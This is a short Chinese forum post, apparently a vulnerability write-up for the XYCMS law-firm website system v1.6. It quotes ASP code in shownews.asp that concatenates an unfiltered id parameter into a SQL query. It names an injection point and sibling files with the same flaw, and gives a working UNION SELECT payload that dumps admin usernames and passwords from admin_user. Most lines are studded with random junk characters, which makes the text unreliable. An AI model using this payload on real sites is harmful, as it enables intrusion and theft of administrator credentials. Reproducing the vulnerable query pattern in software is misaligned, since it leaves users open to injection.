前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
2 V" t9 v. f# U4 p
: q h7 [& Y4 [淫荡分割线
& Z# N- I' W9 b4 P--------------------------------------------------------
# Y! }7 f; L/ k( ` : I/ G0 C5 y/ r
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
0 P) d8 {( W, F; k3 b: V; i6 }源码地址:http://down.chinaz.com/soft/29233.htm
+ C7 X; ?5 i* ^) G: A7 u3 j
" K, L F$ t! m4 H# u1 |+ q漏洞文件:shownews.asp
- `7 \. Z1 d, s- `. c( e漏洞代码:7-13行
* @+ Z' H! r2 m& f + ^6 R: ~. e9 v( Z! ]+ u
, r8 W1 s6 @, U<% ! b! T$ D; a, g' }
id=request.QueryString("id")
: ~7 j0 L- D' E * L. B1 }: J4 ?
set snews=server.createobject("adodb.recordset") 4 N8 q. ?: v/ c" s3 d
exec="select * from [news] where id="&id
+ s, c3 j+ h6 S4 P# |* @* o! M5 Vsnews.open exec,conn,1,1
) A) }$ X- p8 @6 X; h%>
, E/ L: ?6 A. c( I 4 u( S) _9 W" O8 F6 {: h9 l
4 P% h. n/ w; F& @ `什么过滤都没有 直造成注入" h( M6 W8 q5 A- z
5 q2 v( ^' p& z. O2 D. ]/ ^+ p" `3 {
注入点:http://127.0.0.1:99/shownews.asp?id=xx
" Z) b. ~3 L# p& K& f$ c
8 O, d0 u+ m' E; Q: {其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
' A6 U S6 W1 ? _8 m G3 x l6 @7 Q) ~4 d - U4 Y* ~! p5 J4 I- _
- P/ X0 D1 L: w9 N* E1 K+ h9 S
exp: union select 1,admin,password,4,5,7 from admin_user
' h1 X9 j0 m' u3 W( z9 P
" b9 F9 u8 {! w& K( t: Y5 f |